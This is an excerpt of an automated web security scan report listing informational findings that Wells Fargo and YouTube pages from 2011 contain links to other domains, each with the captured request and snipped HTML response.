16.153. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/EFS/WAC1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jump/wachovia/EFS/WAC1?mplx=13270-82708-3408-71 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:05 GMT
Content-length: 6663
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=GLMCNJhR5L4vLJFRkgDT4L8bZl75pqxrZRJpWf1vCQ2lLpn9lpd4!1127287699; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2431933194.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...
<a href="/"><img src="//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/header/logo_62sq.gif" id="jLogo" alt="Wells Fargo Home"></a>
...[SNIP]...
<h1><img class='c22' src='//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/jumppage/wachovia/interst_main_banner_v2.jpg' alt='Welcome. Wachovia is now a part of Wells Fargo.'/></h1>
...[SNIP]...
<br/><a href="https://online.educaid.com/contact.cfm">Contact us</a>
...[SNIP]...
<br/><a href="https://online.educaid.com/borroweraccess/studentsignon.cfm?&y=">Borrower login</a>*<br/><a href="https://online.educaid.com/schoolsignon.cfm?&y=">School login</a>
...[SNIP]...

16.154. https://www.wellsfargo.com/jump/wachovia/insurance/identity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/insurance/identity

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jump/wachovia/insurance/identity?ref=WELLSROSPAG0043&mplx=13270-86569-3408-9 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:06 GMT
Content-length: 6816
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=JJqpNJhSLVKTLv6gLQpjsvSklvlH4WhYJhmkp9pyxGvQzs7M6D7j!-1408825807; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...
<a href="/"><img src="//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/header/logo_62sq.gif" id="jLogo" alt="Wells Fargo Home"></a>
...[SNIP]...
<div class='c9layout'><img src='//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/jumppage/wachovia/interst_main_banner_v2.jpg' alt='Welcome. Wachovia is now a part of Wells Fargo.'/><div class="clearAll">
...[SNIP]...

16.155. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/mortgage/firsttimebuyer

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jump/wachovia/mortgage/firsttimebuyer?dm=DMIWEWACP5 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:04 GMT
Content-length: 5035
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=DwMVNJhQNzWpcNmrc2WYz9Rr7yXFhLPn21Q7n9DDVSqvxMx8Q9mT!-427629300; domain=.wellsfargo.com; path=/; secure
Set-Cookie: dm=DMIWEWACP5; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:04 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1827953418.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...
<a href="/"><img src="//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/header/logo_62sq.gif" id="jLogo" alt="Wells Fargo Home"></a>
...[SNIP]...
<div class='c9layout'><img src='//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/wachovia/interst_main_banner.jpg' alt='Welcome. Wachovia is now a part of Wells Fargo.'/><div class="clearAll">
...[SNIP]...
<div class='c26img'><img src='//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/al_ehl_house2_gen.gif' alt='Equal Housing Lender'/></div>
...[SNIP]...

16.156. https://www.wellsfargo.com/mortgage/rates  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/rates

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mortgage/rates?dm=DMIWFHPRAT HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:43 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=fZ0GNJhXbp9NkTTBKxLLgWdBC8515ftXhHp83yTlYbMCkvhQHzFT!-1408825807; domain=.wellsfargo.com; path=/; secure
Set-Cookie: dm=DMIWFHPRAT; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:43 GMT; path=/
Content-Language: en
Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Home Mortgage - To
...[SNIP]...
<a href="/" tabindex="1"><img src="//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/header/logo_62sq.gif" id="logo" alt="Wells Fargo Home Page"></a><a href="/mortgage" tabindex="1"><img src="//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/header/mortgage.gif" id="mLogo" alt="Home Mortgage"></a><a href="#skip"><img src="//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/s.gif" height="1" width="1" alt="Skip to content"></a>
...[SNIP]...
</div>


<a href="https://adfarm.mediaplex.com/ad/ck/1221-4131-3408-226"><img src="/img/ads/common/iid_IDPrtct01_160x106.gif" class="adv" alt="Protect your identity. ID theft protection helps keep you safe. Learn More"/>
...[SNIP]...
<div class='c26img'><img src='//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/al_ehl_house2_gen.gif' alt='Equal Housing Lender'/></div>
...[SNIP]...

16.157. https://www.wellsfargo.com/mortgage/rates  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/rates

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mortgage/rates?dm=DMIWFHPRAT HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:31:03 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=QmQhNJbHFlYMNX1PhQC1jJykyh32ywbG9c02cRLg142SBQL1BX0G!-1273606700; domain=.wellsfargo.com; path=/; secure
Set-Cookie: dm=DMIWFHPRAT; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:31:03 GMT; path=/
Content-Language: en
Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Home Mortgage - To
...[SNIP]...
<a href="/" tabindex="1"><img src="//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/header/logo_62sq.gif" id="logo" alt="Wells Fargo Home Page"></a><a href="/mortgage" tabindex="1"><img src="//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/header/mortgage.gif" id="mLogo" alt="Home Mortgage"></a><a href="#skip"><img src="//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/s.gif" height="1" width="1" alt="Skip to content"></a>
...[SNIP]...
</div>


<a href="https://adfarm.mediaplex.com/ad/ck/1221-4356-3408-402"><img src="/img/ads/common/mtg_refinancetime2dmiwearmb6_160x106.gif" class="adv" alt="Time to refinance&#63; Find out if it makes sense for you. Learn More"/>
...[SNIP]...
<div class='c26img'><img src='//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/al_ehl_house2_gen.gif' alt='Equal Housing Lender'/></div>
...[SNIP]...

16.158. https://www.wellsfargo.com/wachovia/insurance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/insurance

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /wachovia/insurance?mplx=13270-84627-3408-19 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:15 GMT
Content-length: 5083
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=1WQzNJhbTm1Lbl8GFv1DhvYfGD903TGgSvSKvbhQhbQpXp6GJbqj!191917939; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...
<a href="/"><img src="//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/header/logo_62sq.gif" id="jLogo" alt="Wells Fargo Home"></a>
...[SNIP]...
<div class='c9layout'><img src='//a248.e.akamai.net/f/248/1856/90/www.wellsfargo.com/img/wachovia/interst_main_banner.jpg' alt='Welcome. Wachovia is now a part of Wells Fargo.'/><div class="clearAll">
...[SNIP]...
<li><a href="https://adfarm.mediaplex.com/ad/ck/3001-17442-3408-15">Identity Theft Protection</a>
...[SNIP]...

16.159. http://www.youtube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?q=bluefin+tuna&hl=en&tab=n1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:57:09 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=CGbJez39jes; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:57:09 GMT
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 01:57:09 GMT
Set-Cookie: GEO=75024fc4db5bd6a1b8ba6a15f2dabcebcwsAAAAzR0KtwdbzTUoLdQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFYzemRZQlY0UHZlb0dkYjgtdjBUUGdSVEV6UFRkUVBMVGVQY3VKb2MwN1h3 -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
</title>

<link id="www-core-css" rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-core-vflAcpcNK.css">


<style type="text/css">
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" href="http://www.youtube.com/opensearch?locale=en_US" title="YouTube Video Search">
<link rel="icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="shortcut icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="canonical" href="/?gl=GB&amp;hl=en">
...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflvTi9ps.js"></script>
...[SNIP]...
<a href="/" title="YouTube home">
<img id="logo" class="master-sprite" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="YouTube home">
</a>
...[SNIP]...
</a>

<a class="start" href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F%253Fq%253Dbluefin%252Btuna%2526hl%253Den%2526tab%253Dn1&amp;ltmpl=sso&amp;service=youtube&amp;hl=en_US">Create Account</a><a class="end" href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fq%253Dbluefin%252Btuna%2526hl%253Den%2526tab%253Dn1&amp;hl=en_US&amp;ltmpl=sso">Sign In</a>
...[SNIP]...
</a><img alt="Close" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" onclick="_hidediv('default-language-box');"></div>
...[SNIP]...
</span>
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="master-sprite">
</a>
...[SNIP]...
<div id="ad_creative_1" class="ad-div mastad" style="z-index: 1;">
<iframe id="ad_creative_iframe_1" src="http://ad-emea.doubleclick.net/adi/com.ythome/_default;sz=970x250,960x250;klg=en;kt=K;kga=-1;kgg=-1;kcr=gb;dc_dedup=1;kmyd=ad_creative_1;tile=1;dcopt=ist;ord=7386091418029818?" height="250" width="970" scrolling="no" frameborder="0" style="z-index: 1" id="homepagetop" onload="yt.www.home.ads.workaroundLoad()" onmouseover="yt.www.home.ads.workaroundIE(this)" onfocus="yt.www.home.ads.workaroundIE(this)"></iframe>
...[SNIP]...
</span>
<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&amp;hl=en_US&amp;ltmpl=sso">Sign In</a>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('SLN')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="SLN-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="SLN-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
<span class="clip"><img src="http://i3.ytimg.com/vi/bIu2d7pkghs/market_thumb.jpg?v=acb52f" alt="Thumbnail" class="" title="Big Fat Gypsy Weddings" ></span>
...[SNIP]...
<span class="clip"><img src="http://i4.ytimg.com/vi/CkN56-dnQYU/market_thumb.jpg?v=acd1e8" alt="Thumbnail" class="" title="The Joy of Teen Sex" ></span>
...[SNIP]...
<span class="clip"><img src="http://i4.ytimg.com/vi/W2JBsWkOZpM/market_thumb.jpg?v=a3f6b7" alt="Thumbnail" class="" title="Neighbours" ></span>
...[SNIP]...
<span class="clip"><img src="http://i2.ytimg.com/vi/U0Z5Ja9jCsk/market_thumb.jpg?v=a0a10f" alt="Thumbnail" class="" title="Jamie's 30 Minute Meals" ></span>
...[SNIP]...
<span class="clip"><img src="http://i4.ytimg.com/vi/3olnBX18Ras/market_thumb.jpg?v=8026ad" alt="Thumbnail" class="" title="Come Dine with Me" ></span>
...[SNIP]...
<span class="clip"><img src="http://i4.ytimg.com/vi/o07LAWQyo2w/market_thumb.jpg?v=a3f609" alt="Thumbnail" class="" title="Home And Away" ></span>
...[SNIP]...
<span class="clip"><img src="http://i3.ytimg.com/vi/J3NMkjE6PY0/market_thumb.jpg?v=833da7" alt="Thumbnail" class="" title="Deal or No Deal" ></span>
...[SNIP]...
<span class="clip"><img src="http://i4.ytimg.com/vi/CMQrDzBxZLg/market_thumb.jpg?v=7eb933" alt="Thumbnail" class="" title="Hollyoaks" ></span>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('REC')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="REC-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="REC-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
ointer; display:inline; float: right;" onclick="_hidediv('logged_out_rec_learn_more_box'); return false;" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/Rec_LearnMore_Close');"><img class="img-php-close-button master-sprite" style="background-position: -82px -712px;" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div style="color: black; padding-left: 5px; padding-right: 10px; margin-top: 10px;">
Remember, you will get better, more specific, and more consistent recommendations by <a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&amp;hl=en_US&amp;ltmpl=sso">logging in</a> (or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F&amp;ltmpl=sso&amp;service=youtube&amp;hl=en_US">signing up</a>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('TOP')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="TOP-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="TOP-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="The Sloppy Roethlisberger - Epic Meal Time" data-thumb="//i3.ytimg.com/vi/FCxFn3sAw68/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/24');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Photoshop Tutorial Rap" data-thumb="//i1.ytimg.com/vi/X71WXhOyWj8/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/10');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Paxman said a bad word!" data-thumb="//i4.ytimg.com/vi/WGjXA1GaWDI/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/25');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="3D Maestro" data-thumb="//i2.ytimg.com/vi/uMTvaNomlWY/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/1');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Chelsea FC - Exclusive Torres Interview" data-thumb="//i3.ytimg.com/vi/bHlm_Vk5aBQ/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/17');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="The GOOSE Whisperer" data-thumb="//i1.ytimg.com/vi/xsnuBwYJUoo/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/26');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
